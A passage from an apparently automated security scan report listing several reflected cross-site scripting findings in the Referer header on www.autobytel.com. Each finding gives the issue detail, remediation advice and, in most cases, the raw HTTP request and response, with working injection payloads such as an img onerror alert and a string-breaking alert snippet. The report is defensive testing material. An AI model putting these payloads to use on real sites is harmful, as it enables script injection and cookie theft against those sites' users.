HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:35:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:35:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:35:42 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:35:42 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4daf0%22%3Balert%281%29%2F%2F354c9a1feaa;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37584


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~4daf0";alert(1)//354c9a1feaa";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D256F3-004E-7B32-8036E3E7
...[SNIP]...

4.1944. http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/kbb/index.cfm/action/selectyear/valuetype/TI

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d6991--><img%20src%3da%20onerror%3dalert(1)>66db5d2ea74 was submitted in the Referer HTTP header. This input was echoed as d6991--><img src=a onerror=alert(1)>66db5d2ea74 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/kbb/index.cfm/action/selectyear/valuetype/TI HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=d6991--><img%20src%3da%20onerror%3dalert(1)>66db5d2ea74

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:54 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed6991%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E66db5d2ea74;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 37622


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: d6991--><img src=a onerror=alert(1)>66db5d2ea74 -->
...[SNIP]...

4.1945. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 301b4--><img%20src%3da%20onerror%3dalert(1)>dcf95c6f956 was submitted in the Referer HTTP header. This input was echoed as 301b4--><img src=a onerror=alert(1)>dcf95c6f956 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=301b4--><img%20src%3da%20onerror%3dalert(1)>dcf95c6f956

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:32 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:32 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E301b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Edcf95c6f956;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34821


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 301b4--><img src=a onerror=alert(1)>dcf95c6f956 -->
...[SNIP]...

4.1946. http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d00ae"%3balert(1)//0ebf00d462 was submitted in the Referer HTTP header. This input was echoed as d00ae";alert(1)//0ebf00d462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=d00ae"%3balert(1)//0ebf00d462

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:27:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:27:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:27:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed00ae%22%3Balert%281%29%2F%2F0ebf00d462;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 34781


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~d00ae";alert(1)//0ebf00d462";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4786E60E-D777-87FD-087F806C
...[SNIP]...

4.1947. http://www.autobytel.com/content/shared/modProfile/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autobytel.com
Path:   /content/shared/modProfile/index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2928"><a>d6ef5eee369 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /content/shared/modProfile/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f2928"><a>d6ef5eee369

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:42:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:42:37 GMT
Content-Length: 4302
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:42:37 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<html>
<head>
   <title>Signup</title>
   <link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>


       <span class="DefaultFont">
       <form action="#a.FormAction#
...[SNIP]...
<input type="Hidden" name="LinkBackURL" value="http://www.google.com/search?hl=en&q=f2928"><a>d6ef5eee369">
...[SNIP]...

4.1948. http://www.autobytel.com/content/shared/modProfile/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.autobytel.com
Path:   /content/shared/modProfile/index.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0b2d"><a>85fc07a108 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /content/shared/modProfile/index.cfm?id=4;ABTL&action=handler HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=f0b2d"><a>85fc07a108

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:53:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:53:00 GMT
Content-Length: 4357
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:53:00 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/


<html>
<head>
   <title>Signup</title>
   <link rel="stylesheet" type="text/css" href="/interface/abtl/cars.css">
</head>
<body>


       <span class="DefaultFont">
       <form action="#a.FormAction#
...[SNIP]...
<input type="Hidden" name="LinkBackURL" value="http://www.google.com/search?hl=en&q=f0b2d"><a>85fc07a108">
...[SNIP]...

4.1949. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f142"%3balert(1)//d4b4f172a3f was submitted in the Referer HTTP header. This input was echoed as 3f142";alert(1)//d4b4f172a3f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3f142"%3balert(1)//d4b4f172a3f

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:19 GMT
Content-Length: 22204
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:18 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3f142%22%3Balert%281%29%2F%2Fd4b4f172a3f;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~3f142";alert(1)//d4b4f172a3f";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "488F0E0F-FCD0-2D02-7FBD629B
...[SNIP]...

4.1950. http://www.autobytel.com/coupons/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /coupons/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a8404--><img%20src%3da%20onerror%3dalert(1)>ab45ce7e0a2 was submitted in the Referer HTTP header. This input was echoed as a8404--><img src=a onerror=alert(1)>ab45ce7e0a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /coupons/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=a8404--><img%20src%3da%20onerror%3dalert(1)>ab45ce7e0a2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:28 GMT
Content-Length: 22242
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ea8404%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Eab45ce7e0a2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: a8404--><img src=a onerror=alert(1)>ab45ce7e0a2 -->
...[SNIP]...

4.1951. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9f889--><img%20src%3da%20onerror%3dalert(1)>be04e3ce11a was submitted in the Referer HTTP header. This input was echoed as 9f889--><img src=a onerror=alert(1)>be04e3ce11a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=9f889--><img%20src%3da%20onerror%3dalert(1)>be04e3ce11a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:13 GMT
Content-Length: 22286
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:13 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E9f889%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3Ebe04e3ce11a;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: 9f889--><img src=a onerror=alert(1)>be04e3ce11a -->
...[SNIP]...

4.1952. http://www.autobytel.com/diagnose-problem/my-garage.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /diagnose-problem/my-garage.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 913d2"%3balert(1)//030d163c2c3 was submitted in the Referer HTTP header. This input was echoed as 913d2";alert(1)//030d163c2c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /diagnose-problem/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
